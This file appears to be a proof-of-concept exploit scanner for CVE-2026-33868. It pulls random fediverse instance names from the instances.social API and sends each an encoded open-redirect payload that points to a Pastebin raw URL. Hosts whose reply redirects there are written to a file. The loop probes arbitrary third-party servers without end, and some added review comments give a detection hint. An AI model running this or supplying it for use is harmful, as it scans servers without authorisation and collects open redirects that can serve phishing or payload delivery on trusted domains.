POC / CVE-2026-33868.py PY
import sys
import requests
import os
import time
from concurrent.futures import ThreadPoolExecutor
from threading import Lock

# ANSI escape sequences used to colour console output; RESET restores the default.
GREEN = "\033[92m"
GRAY = "\033[90m"
RED = "\033[91m"
RESET = "\033[0m"

# Percent-encoded path suffix appended after "/web/" in check_vuln. It decodes to
# "/pastebin.com/raw/MpgVg0CQ", i.e. a leading encoded slash followed by an external
# host name. Detection: in web access logs this probe appears as a GET under /web/
# whose next path segment starts with "%2F".
PAYLOAD = "%2Fpastebin.com%2f%72%61%77%2f%4d%70%67%56%67%30%43%51"
# Serialises the duplicate check and append to the output file across worker threads.
write_lock = Lock()

def load_banner():
    """Print the contents of ``banner.txt`` from the working directory, if it exists.

    A missing file produces a grey notice (the message is Indonesian for
    "banner.txt not found"); any other failure is reported in red. Nothing is
    returned and no exception escapes.
    """
    path = "banner.txt"
    try:
        if not os.path.exists(path):
            print(f"{GRAY}[!] banner.txt tidak ditemukan{RESET}")
            return
        # Undecodable bytes are dropped rather than raising (errors="ignore").
        with open(path, "r", encoding="utf-8", errors="ignore") as handle:
            contents = handle.read()
        print(contents)
    except Exception as err:
        print(f"{RED}[!] Error load banner: {err}{RESET}")

def is_already_saved(url, filename):
    """Return True when *url* already appears as a line of *filename*.

    Both the URL and each line are compared with surrounding whitespace
    stripped. A file that does not exist counts as "not saved". The file is
    re-read on every call, so the cost grows with the size of the output file.
    """
    if not os.path.exists(filename):
        return False

    wanted = url.strip()
    with open(filename, "r") as handle:
        for entry in handle:
            if entry.strip() == wanted:
                return True
    return False

def check_vuln(domain, output_file):
    """Send one probe request to *domain* and record the URL if the reply matches.

    The probe is ``https://<domain>/web/<PAYLOAD>``. A reply counts as a match
    when its status is 301 or 302 and the ``Location`` header contains the text
    "pastebin.com". Matches are appended to *output_file* once (guarded by
    ``write_lock``); every outcome is printed except errors, which are dropped.

    NOTE(review): the match is a substring test on the whole header value, so it
    also fires when the text appears in a path or query string of a same-site
    redirect. Treat a [VULN] line as an indicator to confirm by comparing the
    parsed host of ``Location``, not as proof. Other redirect codes (303, 307,
    308) are reported as [SAFE].
    """
    target_url = f"https://{domain}/web/{PAYLOAD}"
    try:
        # Redirects are not followed so the raw Location header can be inspected;
        # certificate verification stays on.
        res = requests.get(target_url, timeout=10, allow_redirects=False, verify=True)
        location = res.headers.get("Location", "")
        matched = res.status_code in [301, 302] and "pastebin.com" in location

        if not matched:
            print(f"{GRAY}[SAFE] {domain}{RESET}")
            return

        # Hold the lock across check-then-append so two threads cannot both
        # decide the URL is new.
        with write_lock:
            if is_already_saved(target_url, output_file):
                print(f"{GRAY}[DUP]  {domain} (Already in file){RESET}")
            else:
                with open(output_file, "a") as f:
                    f.write(target_url + "\n")
                print(f"{GREEN}[VULN] {target_url}{RESET}")

    except Exception:
        # NOTE(review): every failure (DNS, TLS, timeout, file errors) is
        # discarded silently, so a host that could not be reached produces no
        # output at all and is indistinguishable from one never tested.
        pass

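def start_mining(fetch_count, threads, output_file):
    """Sample instance names from the instances.social API in a loop and run check_vuln on each.

    Args:
        fetch_count: Value sent as the API's ``count`` query parameter.
        threads: Worker count for the per-batch thread pool; must convert to a
            positive integer.
        output_file: Path passed through to check_vuln for recording matches.

    The loop runs until the process is interrupted (Ctrl-C calls ``sys.exit``)
    or the API answers 401. Returns None. The host names come from the
    directory's sample endpoint, not from an operator-supplied list.
    """
    api_url = "https://instances.social/api/1.0/instances/sample"

    # The API token is a credential, so it is read from the environment instead
    # of being embedded in the file. A token that has been committed to source
    # should be treated as disclosed and rotated.
    token = os.environ.get("INSTANCES_SOCIAL_TOKEN", "").strip()
    if not token:
        print(f"{RED}[!] INSTANCES_SOCIAL_TOKEN is not set{RESET}")
        return
    headers = {"Authorization": f"Bearer {token}"}

    # Validate the worker count once, before the loop. Converting it inside the
    # loop meant a bad value was caught by the generic handler below and the
    # function kept calling the API every few seconds without ever doing work.
    try:
        workers = int(threads)
    except (TypeError, ValueError):
        print(f"{RED}[!] Error: threads must be an integer, got {threads!r}{RESET}")
        return
    if workers < 1:
        print(f"{RED}[!] Error: threads must be at least 1, got {workers}{RESET}")
        return

    print(f"[*] Mining Started - Threads: {threads} - Mode: Accurate Anti-Duplicate")

    while True:
        try:
            response = requests.get(api_url, headers=headers, params={"count": fetch_count}, timeout=15)
            if response.status_code == 401:
                print(f"{RED}[!] Token Error / Expired{RESET}")
                break

            data = response.json().get("instances", [])
            domains = [i['name'] for i in data]

            # Leaving the with-block waits for every submitted check to finish
            # before the next batch is requested.
            with ThreadPoolExecutor(max_workers=workers) as executor:
                for dom in domains:
                    executor.submit(check_vuln, dom, output_file)

            time.sleep(1)

        except KeyboardInterrupt:
            print(f"\n{RED}[!] Stopping...{RESET}")
            sys.exit()
        except Exception as e:
            # Any other failure (network error, non-JSON body, missing "name"
            # key) is reported and retried after a pause.
            print(f"{RED}[!] Error: {e}{RESET}")
            time.sleep(5)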

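if __name__ == "__main__":
    load_banner()

    # Expected form: <fetch_count> <threads> -o <output.txt>. The third argument
    # is checked so that a misplaced value is not silently ignored, and a usage
    # error exits with a non-zero status.
    if len(sys.argv) < 5 or sys.argv[3] != "-o":
        print(f"{RED}Usage: python3 1.py <fetch_count> <threads> -o <output.txt>{RESET}")
        sys.exit(1)

    f_count, t_count, out_f = sys.argv[1], sys.argv[2], sys.argv[4]

    start_mining(f_count, t_count, out_f)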